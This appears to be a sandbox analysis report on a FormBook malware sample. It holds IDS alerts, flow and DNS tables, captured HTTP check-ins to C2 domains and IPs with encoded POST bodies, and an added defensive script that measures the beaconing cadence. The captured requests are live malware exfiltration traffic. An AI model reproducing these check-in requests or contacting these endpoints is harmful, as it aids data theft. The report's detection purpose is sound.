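The verdict string is deliberately conservative: the dynamic signatures a sandbox produces (thread-context changes, queued APCs, foreign memory writes) come from behaviour, and the static table can only say that the pieces for such behaviour are reachable.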
Language of compilation system  Country where language is spoken
English                         Great Britain
Timestamp                        SID      Signature                                     Severity  Source IP    Source Port  Dest IP          Dest Port  Protocol
2024-11-22T12:42:31.928508+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49808        43.205.198.29    80         TCP
2024-11-22T12:42:34.600224+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49815        43.205.198.29    80         TCP
2024-11-22T12:42:37.256489+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49821        43.205.198.29    80         TCP
2024-11-22T12:42:46.715244+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49843        172.67.220.36    80         TCP
2024-11-22T12:42:49.383453+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49850        172.67.220.36    80         TCP
2024-11-22T12:42:52.184148+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49859        172.67.220.36    80         TCP
2024-11-22T12:43:01.932322+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49882        194.245.148.189  80         TCP
2024-11-22T12:43:04.796233+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49888        194.245.148.189  80         TCP
2024-11-22T12:43:08.086956+0100  2855464  ETPRO MALWARE FormBook CnC Checkin (POST) M3  1         192.168.2.4  49899        194.245.148.189  80         TCP
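Read together with the TCP flow table that follows, the nine alerts above show a clear cadence: three POST check-ins to one host roughly 2.7 to 3.3 seconds apart, then a gap of about 9.5 seconds before the same pattern repeats against the next host, for three hosts in turn, each check-in on a fresh client port. The flow table also contains client connections that produced no alert at all: port 49768 to 38.47.233.21, 49827 to 43.205.198.29 and 49866 to 172.67.220.36, so counting alerts alone undercounts the sample's outbound connections. The added example below, not part of the Joe Sandbox report, derives the cadence, the host rotation and the unalerted flows from tuples constructed from those two tables; the field layout of the tuples and the function names are this example's own.

```python
"""Added example: check-in cadence, C2 rotation and alert/flow correlation
derived from the IDS alert table and the TCP flow table of this report."""
from collections import OrderedDict
from datetime import datetime

# Constructed from the Suricata table: (timestamp, sid, src_port, dst_ip, dst_port)
ALERTS = [
    ("2024-11-22T12:42:31.928508+0100", 2855464, 49808, "43.205.198.29", 80),
    ("2024-11-22T12:42:34.600224+0100", 2855464, 49815, "43.205.198.29", 80),
    ("2024-11-22T12:42:37.256489+0100", 2855464, 49821, "43.205.198.29", 80),
    ("2024-11-22T12:42:46.715244+0100", 2855464, 49843, "172.67.220.36", 80),
    ("2024-11-22T12:42:49.383453+0100", 2855464, 49850, "172.67.220.36", 80),
    ("2024-11-22T12:42:52.184148+0100", 2855464, 49859, "172.67.220.36", 80),
    ("2024-11-22T12:43:01.932322+0100", 2855464, 49882, "194.245.148.189", 80),
    ("2024-11-22T12:43:04.796233+0100", 2855464, 49888, "194.245.148.189", 80),
    ("2024-11-22T12:43:08.086956+0100", 2855464, 49899, "194.245.148.189", 80),
]

# Constructed from the TCP flow table: one (client_port, dst_ip) per connection
# that the visible part of the table contains.
FLOWS = [
    (49768, "38.47.233.21"), (49808, "43.205.198.29"), (49815, "43.205.198.29"),
    (49821, "43.205.198.29"), (49827, "43.205.198.29"), (49843, "172.67.220.36"),
    (49850, "172.67.220.36"), (49859, "172.67.220.36"), (49866, "172.67.220.36"),
    (49882, "194.245.148.189"), (49888, "194.245.148.189"),
]


def parse_ts(ts: str) -> datetime:
    """Suricata-style timestamp with a +HHMM offset -> aware datetime."""
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z")


def group_by_destination(alerts) -> "OrderedDict[str, list]":
    """Destinations in order of first contact, each with its alert times in order."""
    groups = OrderedDict()
    for ts, _sid, _sport, dst, _dport in sorted(alerts, key=lambda a: parse_ts(a[0])):
        groups.setdefault(dst, []).append(parse_ts(ts))
    return groups


def intervals(times) -> list:
    """Seconds between consecutive events."""
    return [(b - a).total_seconds() for a, b in zip(times, times[1:])]


def cadence_report(alerts) -> dict:
    """Per-host check-in count and spacing, plus the pause before each host switch."""
    groups = group_by_destination(alerts)
    hosts = list(groups)
    rotation_gaps = [(groups[nxt][0] - groups[prev][-1]).total_seconds()
                     for prev, nxt in zip(hosts, hosts[1:])]
    return {
        "rotation": hosts,
        "checkins_per_host": {h: len(t) for h, t in groups.items()},
        "intra_host_intervals": {h: intervals(t) for h, t in groups.items()},
        "rotation_gaps": rotation_gaps,
    }


def unalerted_flows(flows, alerts) -> list:
    """Client connections with no IDS alert: traffic the rule did not match."""
    alerted_ports = {a[2] for a in alerts}
    return [f for f in flows if f[0] not in alerted_ports]


if __name__ == "__main__":
    rep = cadence_report(ALERTS)
    print("rotation:", " -> ".join(rep["rotation"]))
    for host, gaps in rep["intra_host_intervals"].items():
        print(f"{host:16s} {rep['checkins_per_host'][host]} check-ins, spacing {gaps}")
    print("rotation gaps:", rep["rotation_gaps"])
    print("flows without alert:", unalerted_flows(FLOWS, ALERTS))
```

The same three functions work on a full EVE/JSON alert export plus a Zeek conn.log: a fixed number of check-ins per host, a near-constant spacing and a longer pause before each host switch are the features a beaconing rule keys on, and the unalerted flows are where to look for the GET requests or decoy hosts the checkin signature does not cover.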
Timestamp                            Source Port  Dest Port  Source IP        Dest IP
Nov 22, 2024 12:42:13.001437902 CET  49768        80         192.168.2.4      38.47.233.21
Nov 22, 2024 12:42:13.121184111 CET  80           49768      38.47.233.21     192.168.2.4
Nov 22, 2024 12:42:13.121288061 CET  49768        80         192.168.2.4      38.47.233.21
Nov 22, 2024 12:42:13.137100935 CET  49768        80         192.168.2.4      38.47.233.21
Nov 22, 2024 12:42:13.256855965 CET  80           49768      38.47.233.21     192.168.2.4
Nov 22, 2024 12:42:14.707618952 CET  80           49768      38.47.233.21     192.168.2.4
Nov 22, 2024 12:42:14.707645893 CET  80           49768      38.47.233.21     192.168.2.4
Nov 22, 2024 12:42:14.708138943 CET  49768        80         192.168.2.4      38.47.233.21
Nov 22, 2024 12:42:14.711889029 CET  49768        80         192.168.2.4      38.47.233.21
Nov 22, 2024 12:42:14.831471920 CET  80           49768      38.47.233.21     192.168.2.4
Nov 22, 2024 12:42:30.287194967 CET  49808        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:30.407033920 CET  80           49808      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:30.407120943 CET  49808        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:30.421319008 CET  49808        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:30.540931940 CET  80           49808      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:31.928508043 CET  49808        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:31.999907970 CET  80           49808      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:31.999963045 CET  49808        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:32.000138044 CET  80           49808      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:32.000185966 CET  49808        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:32.048166990 CET  80           49808      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:32.048228979 CET  49808        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:32.946918964 CET  49815        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:33.067173958 CET  80           49815      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:33.067271948 CET  49815        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:33.086255074 CET  49815        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:33.205873966 CET  80           49815      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:34.600224018 CET  49815        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:34.668154001 CET  80           49815      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:34.668239117 CET  80           49815      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:34.668322086 CET  49815        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:34.668322086 CET  49815        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:34.721312046 CET  80           49815      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:34.723205090 CET  49815        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:35.618840933 CET  49821        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:35.739454985 CET  80           49821      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:35.739661932 CET  49821        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:35.754379034 CET  49821        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:35.874264002 CET  80           49821      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:35.874335051 CET  80           49821      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:35.874388933 CET  80           49821      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:35.874408007 CET  80           49821      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:35.874432087 CET  80           49821      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:35.874444008 CET  80           49821      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:35.874485970 CET  80           49821      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:35.874506950 CET  80           49821      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:35.874552965 CET  80           49821      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:37.256489038 CET  49821        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:37.269301891 CET  80           49821      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:37.269366980 CET  80           49821      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:37.269481897 CET  49821        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:37.269521952 CET  49821        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:37.376121998 CET  80           49821      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:37.376183033 CET  49821        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:38.275856972 CET  49827        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:38.395473957 CET  80           49827      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:38.395572901 CET  49827        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:38.404337883 CET  49827        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:38.523931980 CET  80           49827      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:39.874555111 CET  80           49827      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:39.874614000 CET  80           49827      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:39.874773979 CET  49827        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:39.883696079 CET  49827        80         192.168.2.4      43.205.198.29
Nov 22, 2024 12:42:40.003241062 CET  80           49827      43.205.198.29    192.168.2.4
Nov 22, 2024 12:42:45.233834028 CET  49843        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:45.353446960 CET  80           49843      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:45.354249001 CET  49843        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:45.372070074 CET  49843        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:45.493594885 CET  80           49843      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:46.715147018 CET  80           49843      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:46.715178013 CET  80           49843      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:46.715244055 CET  49843        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:46.715779066 CET  80           49843      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:46.715914965 CET  80           49843      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:46.715967894 CET  49843        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:46.881462097 CET  49843        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:47.899976015 CET  49850        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:48.019548893 CET  80           49850      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:48.019642115 CET  49850        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:48.032150030 CET  49850        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:48.152157068 CET  80           49850      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:49.383327007 CET  80           49850      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:49.383393049 CET  80           49850      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:49.383452892 CET  49850        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:49.383929014 CET  80           49850      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:49.383981943 CET  49850        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:49.537841082 CET  49850        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:50.642081022 CET  49859        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:50.761821985 CET  80           49859      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:50.761966944 CET  49859        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:50.814327955 CET  49859        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:50.933983088 CET  80           49859      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:50.934242010 CET  80           49859      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:50.934278965 CET  80           49859      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:50.934329987 CET  80           49859      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:50.934360981 CET  80           49859      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:50.934458017 CET  80           49859      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:50.934484959 CET  80           49859      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:50.934552908 CET  80           49859      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:50.934582949 CET  80           49859      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:52.183542967 CET  80           49859      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:52.184073925 CET  80           49859      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:52.184108973 CET  80           49859      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:52.184148073 CET  49859        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:52.184230089 CET  49859        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:52.334660053 CET  49859        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:53.397495031 CET  49866        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:53.518520117 CET  80           49866      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:53.518625975 CET  49866        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:53.569525003 CET  49866        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:53.689410925 CET  80           49866      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:54.964524984 CET  80           49866      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:54.964586020 CET  80           49866      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:54.964608908 CET  80           49866      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:54.964627981 CET  80           49866      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:54.964639902 CET  80           49866      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:54.964651108 CET  80           49866      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:54.964663982 CET  80           49866      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:54.964740038 CET  49866        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:54.964772940 CET  80           49866      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:54.964817047 CET  80           49866      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:54.964817047 CET  49866        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:54.964829922 CET  80           49866      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:54.964868069 CET  49866        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:54.964900970 CET  49866        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:54.976654053 CET  80           49866      172.67.220.36    192.168.2.4
Nov 22, 2024 12:42:54.977082968 CET  49866        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:54.979670048 CET  49866        80         192.168.2.4      172.67.220.36
Nov 22, 2024 12:42:55.099241972 CET  80           49866      172.67.220.36    192.168.2.4
Nov 22, 2024 12:43:00.460308075 CET  49882        80         192.168.2.4      194.245.148.189
Nov 22, 2024 12:43:00.580061913 CET  80           49882      194.245.148.189  192.168.2.4
Nov 22, 2024 12:43:00.580172062 CET  49882        80         192.168.2.4      194.245.148.189
Nov 22, 2024 12:43:00.595241070 CET  49882        80         192.168.2.4      194.245.148.189
Nov 22, 2024 12:43:00.716284037 CET  80           49882      194.245.148.189  192.168.2.4
Nov 22, 2024 12:43:01.931945086 CET  80           49882      194.245.148.189  192.168.2.4
Nov 22, 2024 12:43:01.932248116 CET  80           49882      194.245.148.189  192.168.2.4
Nov 22, 2024 12:43:01.932322025 CET  49882        80         192.168.2.4      194.245.148.189
Nov 22, 2024 12:43:02.100275993 CET  49882        80         192.168.2.4      194.245.148.189
Nov 22, 2024 12:43:03.417714119 CET  49888        80         192.168.2.4      194.245.148.189
Nov 22, 2024 12:43:03.537348032 CET  80           49888      194.245.148.189  192.168.2.4
                                                Nov 22, 2024 12:43:03.537434101 CET4988880192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:03.552467108 CET4988880192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:03.672174931 CET8049888194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:04.796037912 CET8049888194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:04.796160936 CET8049888194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:04.796232939 CET4988880192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:05.069042921 CET4988880192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:06.525823116 CET4989980192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:06.645481110 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.647138119 CET4989980192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:06.668729067 CET4989980192.168.2.4194.245.148.189
                                                Nov 22, 2024 12:43:06.788604975 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.788692951 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.788722038 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.788753986 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.788863897 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.788896084 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.788989067 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.789020061 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:06.789067030 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:08.086833000 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:08.086872101 CET8049899194.245.148.189192.168.2.4
                                                Nov 22, 2024 12:43:08.086956024 CET4989980192.168.2.4194.245.148.189
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Nov 22, 2024 12:42:12.272578955 CET | 52864 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 12:42:12.994539976 CET | 53 | 52864 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 12:42:29.776873112 CET | 58450 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 12:42:30.272712946 CET | 53 | 58450 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 12:42:44.900434971 CET | 64041 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 12:42:45.231585026 CET | 53 | 64041 | 1.1.1.1 | 192.168.2.4
Nov 22, 2024 12:43:00.037123919 CET | 53633 | 53 | 192.168.2.4 | 1.1.1.1
Nov 22, 2024 12:43:00.457616091 CET | 53 | 53633 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 22, 2024 12:42:12.272578955 CET | 192.168.2.4 | 1.1.1.1 | 0xfa7f | Standard query (0) | www.qqa79.top | A (IP address) | IN (0x0001) | false
Nov 22, 2024 12:42:29.776873112 CET | 192.168.2.4 | 1.1.1.1 | 0x96e3 | Standard query (0) | www.1secondlending.one | A (IP address) | IN (0x0001) | false
Nov 22, 2024 12:42:44.900434971 CET | 192.168.2.4 | 1.1.1.1 | 0x1a2a | Standard query (0) | www.supernutra01.online | A (IP address) | IN (0x0001) | false
Nov 22, 2024 12:43:00.037123919 CET | 192.168.2.4 | 1.1.1.1 | 0x37db | Standard query (0) | www.wine-drinkers.club | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 22, 2024 12:42:12.994539976 CET | 1.1.1.1 | 192.168.2.4 | 0xfa7f | No error (0) | www.qqa79.top | qqa79.top | - | CNAME (Canonical name) | IN (0x0001) | false
Nov 22, 2024 12:42:12.994539976 CET | 1.1.1.1 | 192.168.2.4 | 0xfa7f | No error (0) | qqa79.top | - | 38.47.233.21 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 12:42:30.272712946 CET | 1.1.1.1 | 192.168.2.4 | 0x96e3 | No error (0) | www.1secondlending.one | - | 43.205.198.29 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 12:42:45.231585026 CET | 1.1.1.1 | 192.168.2.4 | 0x1a2a | No error (0) | www.supernutra01.online | - | 172.67.220.36 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 12:42:45.231585026 CET | 1.1.1.1 | 192.168.2.4 | 0x1a2a | No error (0) | www.supernutra01.online | - | 104.21.24.198 | A (IP address) | IN (0x0001) | false
Nov 22, 2024 12:43:00.457616091 CET | 1.1.1.1 | 192.168.2.4 | 0x37db | No error (0) | www.wine-drinkers.club | - | 194.245.148.189 | A (IP address) | IN (0x0001) | false
                                                • www.qqa79.top
                                                • www.1secondlending.one
                                                • www.supernutra01.online
                                                • www.wine-drinkers.club
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49768 | 38.47.233.21 | 80 | 4548 | C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 12:42:13.137100935 CET | 444 | OUT | GET /mz0w/?qjBT=BfTHe4BP_zkdflN&AFF=uMzU0JGK22aEYJLN9gIRRbcx6PQvWyWv0SPCs66KRtTFzrJJ373CiBnwq6iLrm6CBfWGplZZf3wVkFmev9wws6pM55HNj3BAq/9ra29WeR04lUyUIOcydT8= HTTP/1.1
                                                Host: www.qqa79.top
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Nov 22, 2024 12:42:14.707618952 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:42:14 GMT
                                                Content-Type: text/html
                                                Content-Length: 548
                                                Connection: close
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49808 | 43.205.198.29 | 80 | 4548 | C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 12:42:30.421319008 CET | 725 | OUT | POST /6pwo/ HTTP/1.1
                                                Host: www.1secondlending.one
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 200
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.1secondlending.one
                                                Referer: http://www.1secondlending.one/6pwo/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Ascii: AFF=DewrBs2mT9lmqS0h8xo/FhwWGBpKZWTNPx5ns21VAUkobXqqdZEHSQNzlyFMh7ik9/OdrHAaMkApARbeuUnOj2o0bErQsAMAu92UJAkmv7cJP8LjujybVvacQulyg8c06pYoAu37enjigoPEZ8chlIeWCMkeUSXysFi2CrH56X9ooBg+RjK4gQE/+JxPppYgRA==
Nov 22, 2024 12:42:31.999907970 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:42:31 GMT
                                                Content-Type: text/html
                                                Content-Length: 548
                                                Connection: close
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49815 | 43.205.198.29 | 80 | 4548 | C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 12:42:33.086255074 CET | 745 | OUT | POST /6pwo/ HTTP/1.1
                                                Host: www.1secondlending.one
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 220
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.1secondlending.one
                                                Referer: http://www.1secondlending.one/6pwo/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
                                                Data Ascii: AFF=DewrBs2mT9lmpx8h5Sw/NhwVNhpKQ2TJPx1ns3gOAiUob1yqacwHRQNzxiFVvbiv9/S/rGMaMgopARLeujzPimoMWkrSzwMAu92UJAgIv7EJMPTjvGGYWvafG+lyk8c46pZHAq3BelbigtrEZvEisIf8GMlXFQCVrgXlIaqYkG8QgntkASrvyQgMjO47kqlpKKqMfPJ+fEBkSmAeWAn6GZg=
Nov 22, 2024 12:42:34.668154001 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:42:34 GMT
                                                Content-Type: text/html
                                                Content-Length: 548
                                                Connection: close
                                                Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49821 | 43.205.198.29 | 80 | 4548 | C:\Program Files (x86)\GzlfDizlOFsCEsVHarsTCLGgMRlFWzwRRlvlADjOGGIbgLJjxnCJwgZCQa\VFfhzkOtKq.exe
Timestamp | Bytes transferred | Direction | Data
Nov 22, 2024 12:42:35.754379034 CET | 10827 | OUT | POST /6pwo/ HTTP/1.1
                                                Host: www.1secondlending.one
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
                                                Accept-Language: en-us
                                                Accept-Encoding: gzip, deflate, br
                                                Content-Length: 10300
                                                Cache-Control: max-age=0
                                                Connection: close
                                                Content-Type: application/x-www-form-urlencoded
                                                Origin: http://www.1secondlending.one
                                                Referer: http://www.1secondlending.one/6pwo/
                                                User-Agent: Mozilla/5.0 (Windows NT 6.2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.134 Safari/537.36
Nov 22, 2024 12:42:37.269301891 CET | 691 | IN | HTTP/1.1 404 Not Found
                                                Server: nginx
                                                Date: Fri, 22 Nov 2024 11:42:37 GMT
                                                Content-Type: text/html
                                                Content-Length: 548
                                                Connection: close
